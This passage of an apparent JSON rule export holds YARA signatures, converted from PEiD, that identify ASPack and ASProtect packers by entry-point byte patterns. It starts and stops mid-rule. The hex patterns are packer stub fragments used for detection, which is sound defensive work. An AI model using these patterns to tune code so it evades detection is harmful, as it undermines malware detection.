E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n        $b = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 73 00 00 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 2B 04 24 74 04 75 02 EB 02 EB 01 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_1061b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED EA A8 43 00 B8 E4 A8 43 00 03 C5 2B 85 78 AD 43 00 89 85 84 AD 43 00 80 BD 6E AD 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v21_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 72 05 00 00 EB 33 87 DB 90 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2000_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 48 11 00 00 C3 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_106b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 00 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10804_Hint_WIN_EP: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? EB }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v2000: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 72 05 ?? ?? EB }\r\n        $b = { 60 E8 70 05 00 00 EB 4C }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v2001: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 72 05 ?? ?? EB 33 87 DB }\r\n        $b = { 60 E8 72 05 00 00 EB 4C }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_032a_fake_ASPack_211d_emadicius: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 61 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v103b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? E8 0D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 58 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211d_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v108x: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D BB 03 }\r\n        $b = { 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 00 BB 10 6A 44 00 03 DD 2B 9D 2A }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v1061b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 5D 81 ED B8 03 C5 2B 85 0B DE 89 85 17 DE 80 BD 01 }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 80 BD 6E AD 43 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v10801: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 44 BB 10 44 03 DD 2B }\r\n        $b = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 00 BB 10 ?? 44 00 03 DD 2B 9D }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v10802: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 ?? BB 10 6A 44 ?? 03 DD 2B 9D }\r\n        $b = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ED 23 6A 44 00 BB 10 ?? 44 00 03 DD 2B 9D 72 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v10803: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 0A 4A 44 ?? BB 04 4A 44 ?? 03 }\r\n        $b = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_107b_DLL: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 3E D9 43 00 B8 38 D9 43 00 03 C5 2B 85 0B DE 43 00 89 85 17 DE 43 00 80 BD 01 DE 43 00 00 75 15 FE 85 01 DE 43 00 E8 1D 00 00 00 E8 79 02 00 00 E8 12 03 00 00 8B 85 03 DE 43 00 03 85 17 DE 43 00 89 44 24 1C 61 FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b_DLL_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_ASPack_2xx_Heuristic: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 90 90 68 ?? ?? ?? ?? 67 64 FF 36 00 00 67 64 89 26 00 00 F1 90 90 90 90 A8 03 00 00 61 75 08 B8 01 00 00 00 C2 0C 00 68 00 00 00 00 C3 8B 85 26 04 00 00 8D 8D 3B 04 00 00 51 50 FF 95 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 F9 11 00 00 C3 83 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10802_Hint_WIN_EP_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 75 01 90 E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_212withouth_Poly_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10803_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 0A 4A 44 00 BB 04 4A 44 00 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v212_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v104b: PEiD\r\n{\r\n    strings:\r\n        $a = { 75 ?? }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? ?? 80 BD 08 9D }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v105b: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 75 ?? }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_032a_fake_ASPack_211d_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { EB 03 3A 4D 3A 1E EB 02 CD 20 9C EB 02 CD 20 EB 02 CD 20 60 EB 02 C7 05 EB 02 CD 20 E8 03 00 00 00 E9 EB 04 58 40 50 C3 61 9D 1F EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v108: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 75 01 FF }\r\n        $b = { 90 75 01 FF E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule MSLRH_v032a_fake_ASPack_212_emadicius_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 A0 02 EB 05 E8 EB 04 40 00 EB FA E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF 83 C4 08 74 04 75 02 EB 02 EB 01 81 50 E8 02 00 00 00 29 5A 58 6B C0 03 E8 02 00 00 00 29 5A 83 C4 04 58 74 04 75 02 EB 02 EB 01 81 0F 31 50 0F 31 E8 0A 00 00 00 E8 EB 0C 00 00 E8 F6 FF FF FF E8 F2 FF FF FF }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102b_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 8A 1C 40 00 B9 9E 00 00 00 8D BD 4C 23 40 00 8B F7 33 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v106b: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 90 75 ?? }\r\n        $b = { 90 90 90 75 00 E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v104b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 12 9D ?? 89 85 1E 9D ?? ?? 80 BD 08 9D }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_V22_Alexey_Solodovnikov_StarForce_2009408: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD ?? ?? ?? ?? ?? ?? 83 BD 7D 04 00 00 00 89 9D 7D 04 00 00 0F 85 C0 03 00 00 8D 85 89 04 00 00 50 FF 95 09 0F 00 00 89 85 81 04 00 00 8B F0 8D 7D 51 57 56 FF 95 05 0F 00 00 AB B0 00 AE 75 FD 38 07 75 EE 8D 45 7A FF E0 56 69 72 74 75 61 6C 41 6C 6C 6F 63 00 56 69 72 74 75 61 6C 46 72 65 65 00 56 69 72 74 75 61 6C 50 72 6F 74 65 63 74 00 00 8B 9D 8D 05 00 00 0B DB 74 0A 8B 03 87 85 91 05 00 00 89 03 8D B5 BD 05 00 00 83 3E 00 0F 84 15 01 00 00 6A 04 68 00 10 00 00 68 00 18 00 00 6A 00 FF 55 51 89 85 53 01 00 00 8B 46 04 05 0E 01 00 00 6A 04 68 00 10 00 00 50 6A 00 FF 55 51 89 85 4F 01 00 00 56 8B 1E 03 9D 7D 04 00 00 FF B5 53 01 00 00 FF 76 04 50 53 E8 2D 05 00 00 B3 00 80 FB 00 75 5E FE 85 E9 00 00 00 8B 3E 03 BD 7D 04 00 00 FF 37 C6 07 C3 FF D7 8F 07 50 51 56 53 8B C8 83 E9 06 8B B5 4F 01 00 00 33 DB 0B C9 74 2E 78 2C AC 3C E8 74 0A EB 00 3C E9 74 04 43 49 EB EB 8B 06 EB 00 ?? ?? ?? 75 F3 24 00 C1 C0 18 2B C3 89 06 83 C3 05 83 C6 04 83 E9 05 EB CE 5B 5E 59 58 EB 08 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 2B 85 ?? 0B DE ?? 89 85 17 DE ?? ?? 80 BD 01 DE }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v108x_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 03 5D FF E5 E8 F8 FF FF FF 81 ED 1B 6A 44 00 BB 10 6A 44 00 03 DD 2B 9D 2A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v10801_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 EB 0A 5D EB 02 FF 25 45 FF E5 E8 E9 E8 F1 FF FF FF E9 81 ?? ?? ?? 44 00 BB 10 ?? 44 00 03 DD 2B 9D }\r\n        $b = { 60 EB ?? 5D EB ?? FF ?? ?? ?? ?? ?? E9 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v100b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 5D 81 ED D2 2A 44 B8 CC 2A 44 03 C5 2B 85 A5 2E 44 89 85 B1 2E 44 80 BD 9C 2E }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED 92 1A 44 ?? B8 8C 1A 44 ?? 03 C5 2B 85 CD 1D 44 ?? 89 85 D9 1D 44 ?? 80 BD C4 1D 44 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_102b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 2B 85 7D 7C 43 00 89 85 89 7C 43 00 80 BD 74 7C 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v102a: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 5D 81 ED 96 78 43 B8 90 78 43 03 C5 2B 85 7D 7C 43 89 85 89 7C 43 80 BD 74 7C }\r\n        $b = { 60 E8 ?? ?? ?? ?? 5D 81 ED 3E D9 43 ?? B8 38 ?? ?? ?? 03 C5 2B 85 0B DE 43 ?? 89 85 17 DE 43 ?? 80 BD 01 DE 43 ?? ?? 75 15 FE 85 01 DE 43 ?? E8 1D ?? ?? ?? E8 79 02 ?? ?? E8 12 03 ?? ?? 8B 85 03 DE 43 ?? 03 85 17 DE 43 ?? 89 44 24 1C 61 FF }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v102b: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED 96 78 43 ?? B8 90 78 43 ?? 03 }\r\n        $b = { 60 E8 00 00 00 00 5D 81 ED 96 78 43 00 B8 90 78 43 00 03 C5 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASPack_v108x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? ?? ?? ?? EF 40 03 A7 07 8F 07 1C 37 5D 43 A7 04 B9 2C 3A }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v211b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 02 00 00 00 EB 09 5D 55 81 ED 39 39 44 00 C3 E9 3D 04 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v105b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED CE 3A 44 ?? B8 C8 3A 44 ?? 03 C5 2B 85 B5 3E 44 ?? 89 85 C1 3E 44 ?? 80 BD AC 3E 44 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_211_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 3D 04 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_212b_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB EC FF FF FF 03 DD 81 EB 00 ?? ?? 00 83 BD 22 04 00 00 00 89 9D 22 04 00 00 0F 85 65 03 00 00 8D 85 2E 04 00 00 50 FF 95 4C 0F 00 00 89 85 26 04 00 00 8B F8 8D 5D 5E 53 50 FF 95 48 0F 00 00 89 85 4C 05 00 00 8D 5D 6B 53 57 FF 95 48 0F }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v1061b_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED EA A8 43 ?? B8 E4 A8 43 ?? 03 C5 2B 85 78 AD 43 ?? 89 85 84 AD 43 ?? 80 BD 6E AD 43 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASPack_v107b_DLL_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 00 00 00 00 5D ?? ?? ?? ?? ?? ?? B8 ?? ?? ?? ?? 03 C5 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}"
        },
        {
            "id": 112,
            "key": "yara_detect_asprotect",
            "type": {
                "id": 1,
                "name": "YARA",
                "syntax_lang": "YARA"
            },
            "name": "YARA_Detect_Asprotect",
            "rule": "rule ASProtect_v123_RC1: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? 00 E8 01 00 00 00 C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_dll_Alexey_Solodovnikov_h_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_exe_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n        $b = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB ?? ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C 00 }\r\n    condition:\r\n        for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule ASProtect_130824_beta: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? 40 00 E8 01 00 00 00 C3 C3 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 89 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12_Alexey_Solodovnikov_h1: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 1B 00 00 00 E9 FC 8D B5 0F 06 00 00 8B FE B9 97 00 00 00 AD 35 78 56 34 12 AB 49 75 F6 EB 04 5D 45 55 C3 E9 ?? ?? ?? 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_vxx: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 ?? ?? ?? ?? ?? 90 5D ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_vxx_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 90 E8 00 00 00 00 5D 81 ED D1 27 40 00 B9 15 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule _PseudoSigner_01_ASProtect_Anorganix_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 90 90 90 90 90 90 5D 90 90 90 90 90 90 90 90 90 90 90 03 DD E9 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_23_SKE_build_0426_Beta_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 60 40 00 E8 01 00 00 00 C3 C3 0D 6C 65 3E 09 84 BB 91 89 38 D0 5A 1D 60 6D AF D5 51 2D A9 2F E1 62 D8 C1 5A 8D 6B 6E 94 A7 F9 1D 26 8C 8E FB 08 A8 7E 9D 3B 0C DF 14 5E 62 14 7D 78 D0 6E }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_2122_dll_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 ED 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v123_RC4_build_0807_dll_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 D5 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12x_New_Strain_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? E8 01 ?? ?? ?? C3 C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_23_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 E5 0B 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? 00 00 00 00 B8 F8 C0 A5 23 50 50 03 45 4E 5B 85 C0 74 1C EB 01 E8 81 FB F8 C0 A5 23 74 35 33 D2 56 6A 00 56 FF 75 4E FF D0 5E 83 FE 00 75 24 33 D2 8B 45 41 85 C0 74 07 52 52 FF 75 35 FF D0 8B 45 35 85 C0 74 0D 68 00 80 00 00 6A 00 FF 75 35 FF 55 3D 5B 0B DB 61 75 06 6A 01 58 C2 0C 00 33 C0 F7 D8 1B C0 40 C2 0C }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v11_BRS_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E9 ?? 05 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v_If_you_know_this_version_post_on_PEiD_board: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? 00 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 DD 09 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v12x_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 00 00 68 01 ?? ?? ?? C3 AA }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_V2X_DLL_Alexey_Solodovnikov: PEiD\r\n{\r\n    strings:\r\n        $a = { 60 E8 03 00 00 00 E9 ?? ?? 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ?? ?? ?? ?? 03 DD }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v132: PEiD\r\n{\r\n    strings:\r\n        $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 01 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_v_If_you_know_this_version_post_on_PEiD_board_h2_additional: PEiD\r\n{\r\n    strings:\r\n        $a = { 33 C0 E9 ?? ?? FF FF ?? 1C ?? ?? 40 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_12_Solodovnikov_Alexey: PEiD\r\n{\r\n    strings:\r\n        $a = { 68 01 ?? ?? ?? C3 }\r\n    condition:\r\n        $a at pe.entry_point\r\n\r\n}\r\nrule ASProtect_SKE_23_Alexey_Solodovnikov_h: PEiD\r\n{\r\n    strings:\r\n        $a = { 90 60 E8 03 00 00 00 E9 EB 04 5D 45 55 C3 E8 01 00 00 00 EB 5D BB ED FF FF FF 03 DD 81 EB 00 ?? ?? ?? 80 7D 4D 01 75 0C 8B 74 24 28 83 FE 01 89 5D 4E 75 31 8D 45 53 50 53 FF B5 E5 0B 00 00 8D 45 35 50 E9 82 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 